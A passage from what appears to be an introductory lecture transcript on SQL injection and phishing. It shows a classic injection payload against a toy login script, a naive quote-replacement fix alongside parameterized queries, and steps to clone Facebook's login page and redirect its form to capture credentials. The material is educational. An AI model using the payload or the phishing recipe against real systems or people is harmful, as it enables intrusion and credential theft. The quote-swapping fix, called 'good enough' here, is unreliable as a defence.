  • to be database administrators, that they're

  • able to execute exactly this kind of trick on the admin user.

  • Now they have administrative access to your database, which

  • means they can do things like manipulate the data in the database,

  • change things, add things, delete things that you don't want to have deleted.

  • And in the case of a database, deletion is pretty permanent.

  • You can't undo a delete most of the time in a database

  • the way you might be able to do with other files.

  • Now, are there techniques to avoid this kind of attack?

  • Fortunately, there are.

  • Right now I'd just like to take a look at a very simple Python

  • program that replicates the kind of thing

  • that one could do in a more robust, more complex SQL situation.

  • So let's pull up a program here where we're just

  • simulating this idea of a SQL injection just

  • to show you how it's not that difficult to defend against it.

  • So let's pull up the code here in this file login.py.

  • So there's not that much going on here.

  • I have x equals input username.

  • So x, recall, is a Python variable.

  • And input username is basically going to prompt the user with the string

  • username and then expect them to type something after that.

  • And then we do exactly the same thing with password

  • except storing the result there in y.

  • So whatever the user types after username will get stored in x.

  • Whatever they type after password will get stored in y.

  • And then here I'm just going to print.

  • And in the SQL context, this would be the query that actually gets executed.

  • So imagine that that's what's happening instead.

  • SELECT star from users where username equals and then this symbol here,

  • '{x}'.

  • What I'm doing here is just using a Python-formatted string.

  • That's what this f here-- it's not a typo--

  • at the beginning means, is I'm going to plug in whatever the person, the user,

  • typed at the first prompt, which I stored in x here,

  • and whatever the user typed at the second prompt, which is stored in y there.
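
Piecing that description together, login.py might look roughly like this; it's a sketch based on what's described, not the exact file.

```python
# login.py -- builds the query by pasting user input straight into the string.
x = input("username: ")
y = input("password: ")
print(f"SELECT * FROM users WHERE username = '{x}' AND password = '{y}'")
```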

  • So let's actually just run this program.

  • So let's pop open here for a second.

  • The name of this program is login.py, so I'm going to type python

  • login.py, Enter.

  • Username, Doug.

  • Password, 12345.

  • And then the query, hypothetically, that would get executed if I constructed it

  • in this way is SELECT star from users where username

  • equals Doug and password equals 12345.

  • Seems reasonable.

  • But if I try and do the adversary thing that I did a moment ago,

  • username equals Doug, password equals 1' or '1' equals '1, with no

  • final single quote, and I hit Enter, then I end up with SELECT star

  • from users where username equals Doug and password equals 1 or 1 equals 1.

  • And the latter part of that is true.

  • The former part is false.

  • But it's good enough that I would be able to log in

  • if I did something like that.

  • But we want to try and get around that.

  • So now let's take a look at a second file that might solve this problem.

  • So I'm going to open up login2.py in my editor here.

  • So now it starts out exactly the same, x equals something, y equals something.

  • But I'm making a pretty basic substitution.

  • I'm replacing every single quote that I see with a double quote.

  • So I'm replacing every instance of single quote,

  • and I have to preface it with a backslash.

  • Because notice I'm actually using single quotes in the Python code

  • to set off the character that I'm trying to substitute.

  • The thing I'm trying to substitute actually is a single quote,

  • and so I need to put a backslash in front of it

  • to escape that character such that it actually

  • gets treated as a single quotation mark character as opposed

  • to some special Python--

  • Python's not going to try and interpret it in some other way.

  • So I want to replace every instance of a single quote in x with a double quote,

  • and I want to replace every instance of a single quote in y

  • with a double quote.
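
Again as a sketch of what's being described, login2.py would differ only in those two replace calls.

```python
# login2.py -- same prompts, but every single quote in the input is swapped
# for a double quote before the query string is built.
x = input("username: ").replace('\'', '"')
y = input("password: ").replace('\'', '"')
print(f"SELECT * FROM users WHERE username = '{x}' AND password = '{y}'")
```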

  • Now, why do I want to do that?

  • Because notice in my actual Python string here

  • I'm using single quotes to set off the variables for purposes

  • of SQL's interpretation of them.

  • So where the username equals this string,

  • I'm using single quotes to do that.

  • So if my username or my password also contained single quotation mark

  • characters, when SQL was interpreting it,

  • it might think that the next single quote character it sees is the end.

  • I'm done with what I've prompted.

  • And that's exactly how I tricked it in the previous example.

  • I used that first single quote, which seemed kind of random and out

  • of nowhere, to trick SQL into thinking I'm done with this.

  • Then I used the keyword or, back now in SQL itself and not some string

  • that I'm searching for, and then I would continue this trick going forward.

  • So this is designed to eliminate all the single quotes,

  • because the single quotes mean something very special

  • in the context of my SQL query itself.

  • If you're actually using SQL libraries that are tied into Python,

  • the ability to replace things is much more robust than this example.

  • But even this very simple example where I'm

  • doing just this very basic substitution is good enough

  • to get around the injection attack that we just looked at.

  • So this is now in login2.py.

  • Let's do this.

  • Let's Python login2.py.

  • And we'll start out the same way.

  • We'll do Doug and 12345.

  • And it appears that nothing has changed.

  • The behavior is otherwise identical because I'm not

  • trying to do any tricks like that.

  • SELECT star from users where username equals Doug and password equals 12345.

  • But if I now try that same trick that I did a moment ago,

  • so password is 1' or '1' equals '1 and I hit Enter,

  • now I'm not subject to that same SQL injection anymore because I'm trying

  • to select all the information from the users table where the username is Doug

  • and the password equals--

  • And notice that here is the first single quote.

  • Here is the second one.

  • So it's thinking that entire thing now is the password.

  • Only if my password were literally 1" or "1" equals "1

  • would I actually be able to log in.

  • If that happened to be my password, this would work.

  • But otherwise I've escaped.

  • I've stopped the adversary from being able to leverage

  • a simple trick like this to break in to my database

  • when perhaps they're not intended to do so.

  • And again, in actual SQL injection defense, the substitutions that we make

  • are much more complicated than this.

  • We're not just looking for single quote characters and double quote characters,

  • but we're considering semicolons or any other special characters

  • that SQL would interpret as part of a statement.

  • We can escape those out so that users could literally

  • use single quotes or semicolons or the like in their passwords

  • without necessarily compromising the integrity of the entire database

  • overall.
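
One widely used form of that more robust defense is a parameterized query, where the database library binds the values itself. The sketch below uses Python's built-in sqlite3 module and a hypothetical users.db file.

```python
import sqlite3

conn = sqlite3.connect("users.db")   # hypothetical database file
username = input("username: ")
password = input("password: ")
# The ? placeholders are filled in by the library; the input is treated as
# data, never as SQL, so a stray quote can't terminate the string early.
rows = conn.execute(
    "SELECT * FROM users WHERE username = ? AND password = ?",
    (username, password),
).fetchall()
print(rows)
```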

  • So we've taken a look at several of the most common, most obvious ways

  • that an adversary might be able to extract information

  • either from a business or an individual.

  • And these ways are kind of attention-getting in some context.

  • But let's focus now-- let's go back and bring things

  • full circle to something I've mentioned many times,

  • which is humans are the core fatal flaw in all of these security things

  • that we're dealing with here.

  • And so let's bring things full circle by talking

  • about phishing, what phishing is.

  • So phishing is just an attempt by an adversary to prey upon us

  • and our unfortunate general ignorance of basic security protocols.

  • So it's just an attempt to socially engineer,

  • basically, information out of someone.

  • You pretend to be someone that you are not.

  • And if you do so convincingly enough, you

  • might be able to extract information about that person.

  • Now, phishing you'll also see in other contexts that are--

  • computer scientists like to be clever with their wordplay.

  • You'll see things like netting, which is basically a phishing attack that

  • is launched against many people at once, hoping

  • they'll be able to get one or two.

  • There's spear phishing, which is a phishing

  • attack that targets one specific person trying to get information from them.

  • And then there's whaling, which is a phishing attack that

  • is targeted against somebody who is perceived to have a lot of information

  • or whose information is particularly valuable such

  • that you'd be phishing for some big whale.

  • Now, one of the most obvious and easy types of phishing attack

  • looks like this.

  • It's a simple URL substitution.

  • This is how we can write a link in HTML.

  • A is the HTML tag for anchor, which we use for hyperlinks.

  • Href is where we are going to.

  • And then we also have the ability to specify some text at the end of that.

  • These two items do not have to match, as you can see here.

  • I can say we're going to URL2 but actually send you to URL1.

  • This is an incredibly common way to get information from somebody.

  • They think they're going one place but they're actually going someplace else.

  • And to show you, as a very basic example, just how easy it

  • is to potentially trick somebody into going somewhere they're not supposed to

  • and potentially then revealing credentials as well,

  • let's just take a simple example here with Facebook.

  • And why don't we just take a moment to build our own version of Facebook

  • and see if we can't get somebody to potentially reveal information to us?

  • So let's imagine that I have acquired some domain

  • name that's really similar to Facebook.com,

  • like it's off by one character.

  • It's a common typo.

  • For example, fs instead of fa maybe is a common typo.

  • People mistype the A or something like that,

  • which would not necessarily be obvious to somebody at the outset.

  • One way that I might be able to just take advantage of somebody's thinking

  • that they're logging into Facebook is to make a page that

  • looks exactly the same as Facebook.

  • That's actually not very difficult to do.

  • All you have to do is open up Facebook here.

  • And because its HTML is available to me, I can right click on it,

  • view page source, take a second to load here--

  • Facebook is a pretty big site--

  • and then I can just control A to select all, copy all of the content,

  • and paste this in to my index.html, and we will save.

  • And then we'll head back into our terminal here,

  • and I will start Chrome on the file index.html, which

  • is the file that I literally just saved my Facebook information in.

  • So start Chrome index.html.

  • You'll notice that it brings me to this URL

  • here, which is the file path for where I currently live,

  • or where this file currently lives.

  • And this page looks like Facebook, except for the fact that,

  • when I log in, I then get redirected back

  • to something that actually is Facebook and is not something that I control.

  • But at the outset, my page here at the very beginning

  • looks identical to Facebook.

  • Now, the trick here would be to do something

  • so that the user would provide information here in the email box

  • and then here in the password field such that when they click Login,

  • I might be able to get that information from them.

  • Maybe I just am waiting to capture their information.

  • So the next step for me might be to go back into my random set of stuff here.

  • There's a lot of random code that we don't really care about.

  • But the one thing I do care about is what happens when

  • somebody clicks on this Login button.

  • That is interesting to me.

  • So I'm going to go through this and just do control F,

  • control F just being find, the string login.

  • That's the text that's literally written on the button,

  • so hopefully I'll find that somewhere.

  • I'm told I have eight results.

  • So this is, if I just kind of look around

  • for context to try and figure out where I

  • am in the code, the title of something, so that's probably not it.

  • So I don't want to go there.

  • Create an account or login, not quite what I'm looking for.

  • So go the next one.

  • OK, here we go, input value equals login.

  • So now I found an input that is called login.

  • So this is presumably a button that's presumably part of some form.

  • So if I scroll up a little bit higher, hopefully I

  • will find a form, which I do, form ID.

  • And it has an action.

  • The action is to go to this particular page,

  • facebook.com/login/ and so on and so on.

  • But maybe I want to send it somewhere else.

  • So if I replace this entire URL with where I actually want to send the user,

  • where maybe I'm going to capture their information,

  • maybe I'll store this in login.html.

  • And so that's what's going to come in here.

  • And then we'll save the file such that our changes have been captured.

  • So presumably what should happen is now, when

  • you click on the Login button in my fake Facebook,

  • you instead get redirected to login.html rather than the Facebook actual login

  • as we saw just a moment ago.

  • So let's try again.

  • We'll go back here to our fake Facebook page.

  • We will refresh so that we get our new content.

  • Remember, we just changed the HTML content,

  • so we actually need to reload it so that our browser has it.

  • And we'll type in abc@cs50.net and then some password here and click Login,

  • and we get redirected here.

  • Sorry, we are unable to log you in at this time.

  • But notice we're still in a file that I created.

  • I didn't show you login.html, but that's exactly what I put there.

  • Now, I'm not actually going to phish for information here.

  • And I'm not going to do something that would arguably vio--

  • even though I'm using fake data here, I'm

  • not going to do something that would violate the terms of service

  • or get myself in trouble by actually attempting to do some phishing here.

  • But imagine instead of some HTML I had some Python code that was

  • able to read the data from that field.

  • We saw that a moment ago with passwords, right?

  • We know that the possibility exists that if the user types something

  • into a field, we have the ability to extract it.

  • What I could do here is very simple.

  • I could just read those two fields where they typed a username and a password

  • but then display this content.

  • Perhaps it's been the case that you've gone to some website

  • and seen, oh, yeah, sorry, the server can't handle this request right now,

  • or something along those lines.

  • And you maybe think nothing of it.

  • Or maybe I even would then have a link here that says, try again.

  • And if you click Try Again, it would bring you back

  • to Facebook's actual login where you would then enter your credentials

  • and try again and perhaps think everything was fine.

  • But if on this login page I had extracted your username and password

  • by tricking you into thinking you were logging into Facebook,

  • and then maybe I save those in some file somewhere

  • and then just display this to you, you think, ah, they just had an error.

  • Things are a little bit busy.

  • I'll try again.

  • And when you try again, it works.

  • It's really that easy.

  • And the way to avoid phishing expeditions, so to speak,

  • is just to be mindful of what you're doing.

  • Take a look at the URL bar to make sure that you're on the page

  • that you think you're on.

  • Hopefully you've come away now with a bit more

  • of an understanding of cybersecurity and some

  • of the best practices that are put in place to deal

  • with potential cybersecurity threats.

  • Now it's incumbent upon us to use the technology

  • that we have available to help us protect ourselves from ourselves,

  • but not only ourselves and our own data, but also working to protect our clients

  • and their data as well.
